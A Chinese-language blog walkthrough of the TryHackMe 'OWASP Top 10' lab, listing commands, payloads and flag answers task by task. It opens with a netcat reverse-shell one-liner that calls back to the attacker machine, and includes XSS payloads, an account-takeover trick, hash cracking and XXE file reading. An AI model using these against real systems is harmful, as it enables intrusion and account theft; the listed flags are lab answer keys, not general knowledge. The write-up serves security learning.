tryhackme--OWASP Top 10

前面四个Task直接点完成即可，都是一些介绍
直接访问题目说的： http://10.10.141.123/evilshell.php页面，是一个命令执行的页面。
先反弹一个shell，要不然操作不方便

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.9.xx.xx 4444 >/tmp/f  #服务器
nc -lvp 4444   #攻击机

Task 5 [Severity 1] Command Injection Practical

发现Task5的问题和上一篇博文是一模一样的，那我们就来简单复习一下

What strange text file is in the website root directory?

ls -al
drpepper.txt

How many non-root/non-service/non-daemon users are there?

cat /etc/passwd | grep /bin/bash
0

What user is this app running as?

id
www-data

What is the user’s shell set as?

echo $SHELL
/usr/sbin/nologin

What version of Ubuntu is running?

cat /etc/issue
18.04.4 

Print out the MOTD. What favorite beverage is shown?

cat drpepper.txt
Dr Pepper

Task 7 [Severity 2] Broken Authentication Practical

What is the flag that you found in darren’s account?

重新注册一个现有用户：darren ，注意darren后面跟一个空格！！！密码，邮箱任意填，darren 用户虽然是一个新用户但是他却和darren有同等的权限，用注册号的darren 登录

fe86079416a21a3c99937fea8874b667

What is the flag that you found in arthur’s account?

arthur用户也一样的方法

d9ac0f7db4fda460ac3edeb75d75e16e

Task 11 [Severity 3] Sensitive Data Exposure (Challenge)

What is the name of the mentioned directory?

日常扫目录

/assets

Navigate to the directory you found in question one. What file stands out as being likely to contain sensitive data?

访问发现网站数据库

webapp.db

Use the supporting material to access the sensitive data. What is the password hash of the admin user?

下载打开数据库并访问，发现三个用户及其hash值

6eea9b7ef19179a06954edd0f6c05ceb

Crack the hash.What is the admin’s plaintext password?

把hash值拿去md5解密

qwertyuiop

Login as the admin. What is the flag?

用破解得到的密码和账号登录,后台地址前面扫目录也已经扫到了

 THM{Yzc2YjdkMjE5N2VjMzNhOTE3NjdiMjdl}

Task 13 [Severity 4 XML External Entity - eXtensible Markup Language

大多答案在问题中都有

Full form of XML

eXtensible Markup Language

Is it compulsory to have XML prolog in XML documents?

no

Can we validate XML documents against a schema?

yes

How can we specify XML version and encoding in XML document?

 XML prolog

Task 14 [Severity 4] XML External Entity - DTD

How do you define a new ELEMENT?

!ELEMENT

How do you define a ROOT element?

!DOCTYPE

How do you define a new ENTITY?

!ENTITY

Task 16 [Severity 4] XML External Entity - Exploiting

抓包，制作XML阅读文件的payload

Where is falcon’s SSH key located?

常识

What are the first 18 characters for falcon’s private key

MIIEogIBAAKCAQEA7b

Task 18 [Severity 5] Broken Access Control (IDOR Challenge)

越权的题型

Look at other users notes. What is the flag?

抓包爆破

flag{fivefourthree} 

Task 19 [Severity 6] Security Misconfiguration

Hack into the webapp, and find the flag!

访问看到，考默认口令的
谷歌一下Pensive Notes


登录得到

thm{4b9513968fd564a87b28aa1f9d672e17}

Task 20 [Severity 7] Cross-site Scripting

Navigate to http://10.10.150.152/ in your browser and click on the “Reflected XSS” tab on the navbar; craft a reflected XSS payload that will cause a popup saying “Hello”.

payload:

<script>alert('Hello')</script>

ThereIsMoreToXSSThanYouThink

On the same reflective page, craft a reflected XSS payload that will cause a popup with your machines IP address.

payload:

<script>alert(window.location.host)</script>

ReflectiveXss4TheWin

Now navigate to http://10.10.135.248/stored in your browser and make an account.Then add a comment and see if you can insert some of your own HTML.

注册一个账号在Stored XSS处提交一段HTML代码

HTML_T4gs

以下两个本人因为环境问题没用复现成功，payload没错，读者可自行拿去实验

On the same page, create an alert popup box appear on the page with your document cookies.

payload:

<script>alert(document.cookie)</script>

Change “XSS Playground” to “I am a hacker” by adding a comment and using Javascript.

Payload:

document.querySelector('#thm-title').textContent = 'I am a hacker'

Task 21 [Severity 8] Insecure Deserialization

Who developed the Tomcat application?

Apache Software Foundation

What type of attack that crashes services can be performed with insecure deserialization?

Denial of Service

Task 22 [Severity 8] Insecure Deserialization - Objects

if a dog was sleeping, would this be:

A) A State
B) A Behaviour

A Behaviour 

Task 23 [Severity 8] Insecure Deserialization - Deserialization

What is the name of the base-2 formatting that data is sent across a network as?

binary

Task 24 [Severity 8] Insecure Deserialization - Cookies

If a cookie had the path of webapp.com/login , what would the URL that the user has to visit be?

webapp.com/login 

What is the acronym for the web technology that Secure cookies work over?

https

Task 25 [Severity 8] Insecure Deserialization - Cookies Practical

1st flag (cookie value)

注册一个账号，登录查看cookie，base64解密

2nd flag (admin dashboard)

抓包改用户类型为admin

有重定向

THM{heres_the_admin_flag}

Task 26 [Severity 8] Insecure Deserialization - Code Execution

flag.txt

4a69a7ff9fd68

Task 29 [Severity 9] Components With Known Vulnerabilities - Lab

How many characters are in /etc/passwd (use wc -c /etc/passwd to get the answer)

随便点商品，发现一个一个注入点：/bookPerPub.php?pubid=2

谷歌一波该漏洞

1611

Task 30 [Severity 10] Insufficient Logging and Monitoring

有登录尝试，为账号密码爆破

What kind of attack is being carried out?

brute force

ps：

个人站点博客：XingHe，欢迎来踩~